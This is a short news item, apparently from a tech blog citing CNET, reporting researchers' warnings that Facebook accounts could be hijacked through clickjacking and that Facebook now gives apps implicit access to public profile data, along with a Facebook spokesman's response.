Facebook Users Vulnerable to Clickjacking
Noted security consultant and researcher Nitesh Dhanjani has discovered that Facebook has changed its policy regarding third-party applications. It used to be that any app or external site would have to be given express permission by a user to access any profile information. Now, according to Facebook spokesman Simon Axten, Facebook is providing apps and services with "implicit authorization" to access "publicly available information."
But Dhanjani's discoveries don't stop there. He told CNET that Facebook accounts could easily be hijacked using clickjacking attacks, which lead users to sites with malicious code and hide a Facebook login page behind other content, such as embedded videos. Fellow researcher, Shlomi Narkolayev, chimed in, "Using ClickJacking, I also could fool users to click whatever I want: adding me as their friend, delete their account, and even open their camera and microphone."
Axten defended Facebook, telling CNET that such attacks were not unique to Facebook, and that the site had advanced tools to detect and block such malicious scams.
Facebook is a prime target for hackers and malware purveyors, but it's hardly the only one. Jumping ship to Twitter or (shudder) MySpace won't make you safe; only good browsing habits and good malware protection can do that. [From: CNET]